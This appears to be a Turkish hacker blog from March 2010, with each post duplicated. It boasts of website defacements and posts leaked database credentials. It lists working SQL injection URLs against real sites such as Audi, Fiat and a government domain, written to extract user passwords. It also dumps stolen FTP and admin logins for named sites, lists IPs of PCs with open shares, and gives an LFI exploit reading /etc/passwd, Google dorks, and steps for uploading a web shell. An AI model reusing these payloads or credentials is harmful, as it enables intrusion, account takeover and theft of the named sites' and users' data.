25 Mart 2010 Perşembe

Truecrew.net s1ck3d

http://www.truecrew.net/
http://zone-h.org/mirror/id/10420861
http://spy-h.com/mirror/id/15847

$config['Database']['dbname'] = 't_cr_t9';
$config['MasterServer']['username'] = 'nfrt_7';
$config['MasterServer']['password'] = 'nefrap';

Truecrew.net s1ck3d

http://www.truecrew.net/
http://zone-h.org/mirror/id/10420861
http://spy-h.com/mirror/id/15847

$config['Database']['dbname'] = 't_cr_t9';
$config['MasterServer']['username'] = 'nfrt_7';
$config['MasterServer']['password'] = 'nefrap';

Golge.us S1Ck3D

http://golge.us/
http://zone-h.org/mirror/id/10420863
http://spy-h.com/mirror/id/15849

Golge.us S1Ck3D

http://golge.us/
http://zone-h.org/mirror/id/10420863
http://spy-h.com/mirror/id/15849

UnderTaker & AmeN 0wd3d

Standart UnderTaker & AmeN 0wd3d


tanımıyan varsa : http://zone-h.org/archive/notifier=The UnderTaker






<------------------------ İmza ------------------------>
Kalabalıkta Artistlik Yapanın, Tenhada Özrü Kabul OLMAZ


UnderTaker & AmeN 0wd3d

Standart UnderTaker & AmeN 0wd3d


tanımıyan varsa : http://zone-h.org/archive/notifier=The UnderTaker






<------------------------ İmza ------------------------>
Kalabalıkta Artistlik Yapanın, Tenhada Özrü Kabul OLMAZ

Capofs + Paranoyaq 0wn3d

http://cod3r.org/
http://zone-h.org/mirror/id/10415626

Capofs + Paranoyaq 0wn3d

http://cod3r.org/
http://zone-h.org/mirror/id/10415626

21 Mart 2010 Pazar

Audi - Fiat - Nod32 v.s SQL İnjection

http://www.audi.rs//news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.si/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.ua/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.ro/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://ro.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://w3.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.sk/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.com.mk/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.bg/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.com.hr/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://wwww.audi.hu/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.co.yu/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://bg.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.co.rs/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://al.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://cms.hr.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://cms.ua.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://si.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://cms.hr.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users

http://www.nod32-la.com/isps/deperu/news.php?i=-221 UNION SELECT 1,2,3,4,version(),6,7,8--
http://www.hispanicprwire.com/news.php?l=in&id=-1801 UNION SELECT 1,2,3,concat(User,0x3a,Login,0x3a,Password,0x3a,E_mail),5,6,7,8,9,10 from HPR_Extenal_User
http://500.fiat.bg/news.php?id=-62 UNION SELECT 1,2,concat(ime,0x3a,fam,0x3a,pol,0x3a,nacia,0x3a,city,0x3a,tel,0x3a,mail),4,5,6,7 from users
http://fiat.bg/?id=222&lan=BG&nid=-26 UNION SELECT 1,2,3,4,group_concat(table_name),6 from information_schema.tables
http://www.americanbreweriana.org/news/news_detail.php?selectid=-24 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11--


http://www.simbin.se/news.php?newsid=-120 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5 from users
http://www.simbin.se/news.php?newsid=-120 UNION SELECT 1,version(),3,4,5--
http://www.traffictechnologytoday.com/news.php?NewsID=-13388 UNION SELECT 1,2,3,concat(UserName,0x3a,UserPassword),5,6,7,8,9,10 from passenger.Users
http://www.tam.gov.mv/news.php?newsID=-36 UNION SELECT 1,group_concat(username,0x3a,user_password),3,4,5,6 from phpbb_users

Audi - Fiat - Nod32 v.s SQL İnjection

http://www.audi.rs//news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.si/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.ua/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.ro/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://ro.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://w3.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.sk/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.com.mk/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.bg/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.com.hr/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://wwww.audi.hu/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.co.yu/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://bg.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.co.rs/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://al.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://cms.hr.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://cms.ua.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://si.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://cms.hr.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users

http://www.nod32-la.com/isps/deperu/news.php?i=-221 UNION SELECT 1,2,3,4,version(),6,7,8--
http://www.hispanicprwire.com/news.php?l=in&id=-1801 UNION SELECT 1,2,3,concat(User,0x3a,Login,0x3a,Password,0x3a,E_mail),5,6,7,8,9,10 from HPR_Extenal_User
http://500.fiat.bg/news.php?id=-62 UNION SELECT 1,2,concat(ime,0x3a,fam,0x3a,pol,0x3a,nacia,0x3a,city,0x3a,tel,0x3a,mail),4,5,6,7 from users
http://fiat.bg/?id=222&lan=BG&nid=-26 UNION SELECT 1,2,3,4,group_concat(table_name),6 from information_schema.tables
http://www.americanbreweriana.org/news/news_detail.php?selectid=-24 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11--


http://www.simbin.se/news.php?newsid=-120 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5 from users
http://www.simbin.se/news.php?newsid=-120 UNION SELECT 1,version(),3,4,5--
http://www.traffictechnologytoday.com/news.php?NewsID=-13388 UNION SELECT 1,2,3,concat(UserName,0x3a,UserPassword),5,6,7,8,9,10 from passenger.Users
http://www.tam.gov.mv/news.php?newsID=-36 UNION SELECT 1,group_concat(username,0x3a,user_password),3,4,5,6 from phpbb_users

Bazı sunuculardan Ftp hesapları

--------------------------------------------------


kuzeyhosting.com
user : kuzeyhos
pass : erbursa93sin

--------------------------------------------------

site name : ulker.net.tr
ftp user : ulkerint
ftp pass : 944607

--------------------------------------------------

site Name : izmirdavetiye.com.tr İsimtescil.net.
ftp user : izmirdavetiye
ftp pass : ismail_190120

--------------------------------------------------
wordpress.cr
wordpres
f4hb49
--------------------------------------------------
digitalfactory.co.cr
digital
f4hb49
--------------------------------------------------
kandira.web.tr
bydeniss4
elificlal1968elmas

--------------------------------------------------

FileZilla VESSELAM.ORG vessmorg ves70707
vessmorg
---------------------------------------------------
ulkutasarim.net  Olayhosting - Sezenhost
user :  tasarm
sifre : utasarim2009

--------------------------------------------------
http://www.webabi.net/forum/
user  : Webabi
sifre : daly0691

---------------------------------------------------

http://elmes.gen.tr/
ftp_user =elmes.gen
ftp_pass =22704056 
*******************************************
elmes.gen.tr/altinsoft.com gırıs bılgıleri //domaınının bulundugu yer
user:creatien@hotmail.com
pass:22704056


www.archidium.com
http://www.archidium.com/cgi-bin/cgiege.pl
ftp_user = archidium
ftp_pass = asd8cyxa

--------------------------------------------------------

alicengiz.com.tr
user : a.cengiz1966
pass : orangeflower1966

--------------------------------------------------------

http://www.bote.yildiz.edu.tr/v2/administrator
user wwwbto
pass : cskt2211

Bazı sunuculardan Ftp hesapları

--------------------------------------------------


kuzeyhosting.com
user : kuzeyhos
pass : erbursa93sin

--------------------------------------------------

site name : ulker.net.tr
ftp user : ulkerint
ftp pass : 944607

--------------------------------------------------

site Name : izmirdavetiye.com.tr İsimtescil.net.
ftp user : izmirdavetiye
ftp pass : ismail_190120

--------------------------------------------------
wordpress.cr
wordpres
f4hb49
--------------------------------------------------
digitalfactory.co.cr
digital
f4hb49
--------------------------------------------------
kandira.web.tr
bydeniss4
elificlal1968elmas

--------------------------------------------------

FileZilla VESSELAM.ORG vessmorg ves70707
vessmorg
---------------------------------------------------
ulkutasarim.net  Olayhosting - Sezenhost
user :  tasarm
sifre : utasarim2009

--------------------------------------------------
http://www.webabi.net/forum/
user  : Webabi
sifre : daly0691

---------------------------------------------------

http://elmes.gen.tr/
ftp_user =elmes.gen
ftp_pass =22704056 
*******************************************
elmes.gen.tr/altinsoft.com gırıs bılgıleri //domaınının bulundugu yer
user:creatien@hotmail.com
pass:22704056


www.archidium.com
http://www.archidium.com/cgi-bin/cgiege.pl
ftp_user = archidium
ftp_pass = asd8cyxa

--------------------------------------------------------

alicengiz.com.tr
user : a.cengiz1966
pass : orangeflower1966

--------------------------------------------------------

http://www.bote.yildiz.edu.tr/v2/administrator
user wwwbto
pass : cskt2211

19 Mart 2010 Cuma

Paylaşıma açık olan pc ip adresleri

81.173.133.51
81.173.134.124
81.173.135.46
81.173.135.112
81.173.146.189
81.173.147.163
81.173.151.6
81.173.154.249
81.173.157.169
81.173.160.91
81.173.164.232
81.173.165.13
81.173.170.236
81.173.172.5
81.173.184.104
81.173.185.24
81.173.187.203
81.173.224.220
81.173.233.1
81.173.248.224

Paylaşıma açık olan pc ip adresleri

81.173.133.51
81.173.134.124
81.173.135.46
81.173.135.112
81.173.146.189
81.173.147.163
81.173.151.6
81.173.154.249
81.173.157.169
81.173.160.91
81.173.164.232
81.173.165.13
81.173.170.236
81.173.172.5
81.173.184.104
81.173.185.24
81.173.187.203
81.173.224.220
81.173.233.1
81.173.248.224

Joomla / Mambo com_rwcards Lfı exploit

Google dork: index.php?option=com_rwcards

http://localhost/index.php?option=com_rwcards&controller=/ -List

http://www.ankarasosyete.com/index.php?option=com_rwcards&controller=../../../../../../etc/passwd

Joomla / Mambo com_rwcards Lfı exploit

Google dork: index.php?option=com_rwcards

http://localhost/index.php?option=com_rwcards&controller=/ -List

http://www.ankarasosyete.com/index.php?option=com_rwcards&controller=../../../../../../etc/passwd

Mambo com_acstartseite SQL injection..

Google dork : index.php?option=com_acstartseite

http://localhost/index.php?option=com_acstartseite&Itemid=-110 UNION SELECT 1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from mos_users--

Mambo com_acstartseite SQL injection..

Google dork : index.php?option=com_acstartseite

http://localhost/index.php?option=com_acstartseite&Itemid=-110 UNION SELECT 1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from mos_users--

VidiScript Shell Upload

uzun zamandır birşey yazmıyordum daha dogrusu birşeyler yapmıyordum..

Google dork : Powered By VidiScript.com

yukarda verdigim dorku googlede aratıyoruz çıkan sitelere üye olup profil düzenle kısmına geçiyoruz.. sonra bir adet shellimizin uzantısını shell.php.bmp yapıyoruz sonra avatar upload bölümünden siteye yüklüyoruz.. ve shell yolumuzu profil resmimize bakarak alıyor ve shell adresimize baglanıyoruz..

selametle ByEge..

VidiScript Shell Upload

uzun zamandır birşey yazmıyordum daha dogrusu birşeyler yapmıyordum..

Google dork : Powered By VidiScript.com

yukarda verdigim dorku googlede aratıyoruz çıkan sitelere üye olup profil düzenle kısmına geçiyoruz.. sonra bir adet shellimizin uzantısını shell.php.bmp yapıyoruz sonra avatar upload bölümünden siteye yüklüyoruz.. ve shell yolumuzu profil resmimize bakarak alıyor ve shell adresimize baglanıyoruz..

selametle ByEge..